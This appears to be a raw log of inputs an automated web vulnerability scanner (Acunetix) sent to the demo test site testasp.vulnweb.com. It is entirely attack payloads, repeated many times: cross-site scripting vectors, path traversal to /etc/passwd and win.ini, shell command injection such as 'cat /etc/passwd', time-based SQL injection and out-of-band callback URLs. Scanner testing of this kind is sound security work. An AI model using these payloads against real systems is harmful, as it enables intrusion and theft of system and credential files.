testasp.vulnweb.com

1<img/src=">" onerror=alert(988814)>

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

|cat /etc/passwd#

'"()

1

1

1<ScRiPt%20>prompt(901526)</sCripT>

-1

1

1

'|'ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'

1

-1)

1

1

1&lt

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

/etc/passwd

"

"|"ld

1

1

\xf6<img acu onmouseover=prompt(984752) //\xf6>

-1))

1

${@print(md5(acunetix_wvs_security_test))}

1

http://hit7gCKzQoT6m.bxss.me/

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

tOtudA5N'

1<input autofocus onfocus=prompt(950958)>

acunetix_wvs_invalid_filename

1

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

aI9GwSix')

1

"

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

<a href='http://www.acunetix.com'>website security</a>

1

G94IQPY1'))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

http://www.acunetix.tst

||cat /etc/passwd

1

1

1

comments

1

[url=http://www.acunetix.com]website security[/url]

&dir

'"

1

1

comments/.

1'"()&%<ScRiPt >prompt(999267)</ScRiPt>

1

file:///etc/passwd

1

<!--

'&dir&'

1_J0ZhH <ScRiPt >prompt(979033)</ScRiPt>

1

'"()&%<ScRiPt >prompt(913203)</ScRiPt>

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1_907622

1

"&dir&"

1

1

WEB-INF/web.xml

1

1

1

|dir

1

WEB-INF\web.xml

1

1

'|dir

1

../../../../../../../../../../windows/win.ini

1

1

"|dir

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu5969\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5969

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acux1671\xc0\xbez1\xc0\xbcz2a\x90bcxuca1671

1

1

1

1

1

................windowswin.ini

1<ScRiPt >prompt(939821)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(941247)</script>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(972661)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?933856></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(930386)</ScRiPt>

1

1

1

response.write(9219373*9919150)

1

1<video><source onerror="javascript:prompt(963793)">

&cat /etc/passwd&

'+response.write(9219373*9919150)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(943593)"></g></svg>

WEB-INF/web.xml

1

1

"+response.write(9219373*9919150)+"

'&cat /etc/passwd&'

1<div style=width:expression(prompt(983094))>

1

WEB-INF\web.xml

1

"&cat /etc/passwd&"

1<iframe src='data:text/html

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

${99209+100035}

1

1

1<body onload=prompt(904661)>

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

`cat /etc/passwd`

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(902130)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

)

1

1&n908272=v930709

|cat /etc/passwd#

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

1<img src=xyz OnErRor=prompt(977633)>

1some_inexistent_file_with_long_name%00.jpg

!(()&&!|*|*|

1

1

'|'ld

1

1

^(#$!@#$)(()))******

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1)

1<img/src=">" onerror=alert(996920)>

1

"|"ld

1

1

-1))

1<ScRiPt%20>prompt(996408)</sCripT>

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

1

1

1

'"()

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

rxOTyU7n'

1&lt

1

1

'

1

'

YNy3uM25')

\xf6<img acu onmouseover=prompt(968103) //\xf6>

/etc/passwd

1

1

"

"

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

djjQdQMz'))

1<input autofocus onfocus=prompt(955401)>

${@print(md5(acunetix_wvs_security_test))}

1

||cat /etc/passwd

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}\

-1

1

1

1

&dir

http://hitnCmC6sv3ZI.bxss.me/

acunetix_wvs_invalid_filename

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1)

1

[url=http://www.acunetix.com]website security[/url]

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'&dir&'

comments

1

1

1

1_8FYwV <ScRiPt >prompt(966108)</ScRiPt>

-1))

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

http://www.acunetix.tst

"&dir&"

comments

1

Q864ANak'

'"

1'"()&%<ScRiPt >prompt(983617)</ScRiPt>

1

|dir

1

comments/.

TUM5cTI4')

1

1

1

'"()&%<ScRiPt >prompt(957873)</ScRiPt>

1

1

file:///etc/passwd

'|dir

amW4Mkqj'))

<!--

1_957416

1

1

"|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acu8301\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8301

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux2114\xc0\xbez1\xc0\xbcz2a\x90bcxuca2114

1

1

1<ScRiPt >prompt(929500)</ScRiPt>

................windowswin.ini

1

1

1<script>prompt(924339)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(960008)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?955970></ScRiPt>

1

1

1

1<ScRiPt >prompt(914038)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(966569)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(911499)"></g></svg>

response.write(9041172*9471263)

1

1

'+response.write(9041172*9471263)+'

1<div style=width:expression(prompt(993224))>

1

1

1

WEB-INF/web.xml

1

1

&cat /etc/passwd&

"+response.write(9041172*9471263)+"

1<iframe src='data:text/html

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

'&cat /etc/passwd&'

1

1

../../../../../../../../../../etc/passwd

1<body onload=prompt(911375)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(946714)>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

1<img src=xyz OnErRor=prompt(924539)>

1

1

${99562+99338}

1<img/src=">" onerror=alert(903271)>

`cat /etc/passwd`

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<ScRiPt%20>prompt(995339)</sCripT>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

)

1&n986709=v900102

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1&lt

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

1some_inexistent_file_with_long_name%00.jpg

!(()&&!|*|*|

1

\xf6<img acu onmouseover=prompt(998947) //\xf6>

-1

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

^(#$!@#$)(()))******

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

1<input autofocus onfocus=prompt(914554)>

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

testasp.vulnweb.com

-1))

<a href='http://www.acunetix.com'>website security</a>

1

1

"

'

FoejEvcB'

1

1

1

/etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

[url=http://www.acunetix.com]website security[/url]

1

1

uHlLXltf')

${@print(md5(acunetix_wvs_security_test))}\

1

"

http://hitXblroYgWI9.bxss.me/

a7tveHpk'))

1

acunetix_wvs_invalid_filename

1_iJbPt <ScRiPt >prompt(998697)</ScRiPt>

1

||cat /etc/passwd

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

comments

-1

1

1

1

1

&dir

-1)

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

comments

1

http://www.acunetix.tst

'&dir&'

1

'"

1

-1))

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments/.

<!--

"&dir&"

1

1'"()&%<ScRiPt >prompt(956265)</ScRiPt>

wcLS6TYy'

1

1

1

1

|dir

1

'"()&%<ScRiPt >prompt(998096)</ScRiPt>

MQVBv4Vk')

1

1

1

file:///etc/passwd

JUXULIEM'))

1

1_960787

'|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

"|dir

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acu10295\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10295

1

acux4520\xc0\xbez1\xc0\xbcz2a\x90bcxuca4520

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(914231)</ScRiPt>

1

1

response.write(9782551*9367663)

1

1

1<script>prompt(906251)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

'+response.write(9782551*9367663)+'

1

1

"+response.write(9782551*9367663)+"

1

1<ScRiPt >prompt(958004)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

&cat /etc/passwd&

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?958470></ScRiPt>

1

1

'&cat /etc/passwd&'

1

1

1

1<ScRiPt >prompt(995019)</ScRiPt>

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<video><source onerror="javascript:prompt(930108)">

1

cat /etc/passwd

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(944218)"></g></svg>

WEB-INF/web.xml

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

`cat /etc/passwd`

WEB-INF\web.xml

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<div style=width:expression(prompt(941595))>

|cat /etc/passwd#

1

../../../../../../../../../../etc/passwd.jpg

${99354+99175}

1

1<iframe src='data:text/html

1

1

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

'|'ld

1

-1)

1some_inexistent_file_with_long_name%00.jpg

1

1&n919325=v940970

1<body onload=prompt(949796)>

"|"ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

1

-1))

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(925070)>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

!(()&&!|*|*|

1

ODijiaqp'

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img src=xyz OnErRor=prompt(950020)>

1

^(#$!@#$)(()))******

testasp.vulnweb.com

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<img/src=">" onerror=alert(987681)>

'"()

ANloV07Q')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

'

1

OCBoecnW'))

"

/etc/passwd

1

1<ScRiPt%20>prompt(959829)</sCripT>

"

1

1

1

-1

1

||cat /etc/passwd

1&lt

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

-1)

1

1

1

1

http://hitoT3juZkM2Z.bxss.me/

\xf6<img acu onmouseover=prompt(923146) //\xf6>

${@print(md5(acunetix_wvs_security_test))}\

&dir

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

acunetix_wvs_invalid_filename

-1))

1

1

1<input autofocus onfocus=prompt(983342)>

1

1

4YjQgIqR'

comments

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

<a href='http://www.acunetix.com'>website security</a>

1

1

'"

comments

http://www.acunetix.tst

UG2rTYrM')

1

[url=http://www.acunetix.com]website security[/url]

"&dir&"

1

<!--

file:///etc/passwd

comments/.

1_DqL5n <ScRiPt >prompt(981594)</ScRiPt>

1

1

1'"()&%<ScRiPt >prompt(926886)</ScRiPt>

1

|dir

BaKjwxQv'))

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

'"()&%<ScRiPt >prompt(974957)</ScRiPt>

1

'|dir

1

1

WEB-INF/web.xml

1

"|dir

1_933672

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9326197*9721208)

1

1

1

acu10856\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10856

'+response.write(9326197*9721208)+'

1

1

1

1

"+response.write(9326197*9721208)+"

acux5533\xc0\xbez1\xc0\xbcz2a\x90bcxuca5533

1

1<ScRiPt >prompt(974421)</ScRiPt>

1

WEB-INF/web.xml

1

1

1<script>prompt(953088)</script>

&cat /etc/passwd&

1

1

1

WEB-INF\web.xml

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1<ScRiPt >prompt(925518)</ScRiPt>

1

1

1

1

1

"&cat /etc/passwd&"

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?959805></ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1

1

1

1<ScRiPt >prompt(951199)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1<video><source onerror="javascript:prompt(948906)">

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

${99282+100309}

../../../../../../../../../../etc/passwd.jpg

`cat /etc/passwd`

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(946023)"></g></svg>

|cat /etc/passwd#

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1

-1)

1<div style=width:expression(prompt(950565))>

1

1

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

1&n910282=v977483

1

1

1<iframe src='data:text/html

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

)

1

testasp.vulnweb.com

1<body onload=prompt(969237)>

1

nUyMUB0Z'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

'"()

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(939829)>

1

'

fKBFQ6U3')

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

^(#$!@#$)(()))******

1

"

1

1<img src=xyz OnErRor=prompt(900191)>

'

BhtJBaJm'))

1

1

1

1

-1

1

${@print(md5(acunetix_wvs_security_test))}

1<img/src=">" onerror=alert(914180)>

"

1

http://hitYLpTa3EPWM.bxss.me/

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<ScRiPt%20>prompt(918792)</sCripT>

${@print(md5(acunetix_wvs_security_test))}\

-1)

1

1

1

acunetix_wvs_invalid_filename

1

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

1

1&lt

1

&dir

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

4LxANqat'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

\xf6<img acu onmouseover=prompt(962246) //\xf6>

1

comments

'&dir&'

1

1

1

1<input autofocus onfocus=prompt(951458)>

QD569Tit')

'"

"&dir&"

1'"()&%<ScRiPt >prompt(925928)</ScRiPt>

1

comments/.

1

<!--

2MiY1ggZ'))

<a href='http://www.acunetix.com'>website security</a>

file:///etc/passwd

1

1

|dir

'"()&%<ScRiPt >prompt(966727)</ScRiPt>

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

'|dir

1

/\../\../\../\../\../\../\../etc/passwd

1_993162

1

1

1

1_A3USI <ScRiPt >prompt(923395)</ScRiPt>

WEB-INF/web.xml

"|dir

1

1

1

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

acu7775\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7775

1

1

..\..\..\..\..\..\..\..\windows\win.ini

acux9986\xc0\xbez1\xc0\xbcz2a\x90bcxuca9986

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(917141)</ScRiPt>

1

1

1

1

response.write(9889845*9688597)

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

'+response.write(9889845*9688597)+'

1<script>prompt(955170)</script>

1

1

"+response.write(9889845*9688597)+"

1<ScRiPt >prompt(910111)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

&cat /etc/passwd&

1

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?922925></ScRiPt>

1

1

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<ScRiPt >prompt(974635)</ScRiPt>

1

"&cat /etc/passwd&"

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1<video><source onerror="javascript:prompt(958345)">

../../../../../../../../../../etc/passwd

1

cat /etc/passwd

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

${99985+99782}

-1

`cat /etc/passwd`

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(992466)"></g></svg>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

WEB-INF\web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n909262=v986300

1

1

-1)

1<div style=width:expression(prompt(924623))>

1some_inexistent_file_with_long_name%00.jpg

1

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

1

)

1

1

-1))

1<iframe src='data:text/html

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

'|'ld

!(()&&!|*|*|

kDMhBH5p'

testasp.vulnweb.com

1<body onload=prompt(981908)>

1

'"()

^(#$!@#$)(()))******

"|"ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

IpbDjr9f')

'

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(998585)>

1

1

xCq03Cy8'))

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"

1

1<img src=xyz OnErRor=prompt(918145)>

1

1

-1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

${@print(md5(acunetix_wvs_security_test))}

1

-1)

1<img/src=">" onerror=alert(913860)>

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

/etc/passwd

"

1

http://hitbjJtUCuiir.bxss.me/

acunetix_wvs_invalid_filename

1

1<ScRiPt%20>prompt(904840)</sCripT>

-1))

||cat /etc/passwd

1

1

vNymINiy'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1&lt

&dir

1

Re3Ay9SQ')

1

http://www.acunetix.tst

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

\xf6<img acu onmouseover=prompt(922289) //\xf6>

comments

1

RAxv3Ug6'))

'"

1

1<input autofocus onfocus=prompt(958237)>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

comments/.

1

<!--

1

1

1'"()&%<ScRiPt >prompt(904783)</ScRiPt>

1

1

"&dir&"

<a href='http://www.acunetix.com'>website security</a>

1

1

'"()&%<ScRiPt >prompt(958881)</ScRiPt>

1

1

1

[url=http://www.acunetix.com]website security[/url]

file:///etc/passwd

|dir

response.write(9689821*9171000)

1

1

1_902024

1

/\../\../\../\../\../\../\../etc/passwd

'|dir

1_JLv6W <ScRiPt >prompt(902603)</ScRiPt>

'+response.write(9689821*9171000)+'

1

1

&cat /etc/passwd&

1

1

"|dir

WEB-INF/web.xml

1

"+response.write(9689821*9171000)+"

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

WEB-INF\web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

1

../../../../../../../../../../windows/win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

1

acu10539\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10539

../../../../../../../../../../boot.ini

1

../../../../../../../../../../etc/passwd

1

1

`cat /etc/passwd`

1

acux8027\xc0\xbez1\xc0\xbcz2a\x90bcxuca8027

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

../../../../../../../../../../windows/win.ini.jpg

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

|cat /etc/passwd#

1<ScRiPt >prompt(931989)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

${100404+99528}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

................windowswin.ini

'|'ld

1

1

1<script>prompt(942292)</script>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1some_inexistent_file_with_long_name%00.jpg

1&n928967=v959029

1

1

"|"ld

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(909576)</ScRiPt>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?901920></ScRiPt>

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1

1

testasp.vulnweb.com

)

1

1

'

1<ScRiPt >prompt(965216)</ScRiPt>

-1)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

!(()&&!|*|*|

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

"

1

1

-1))

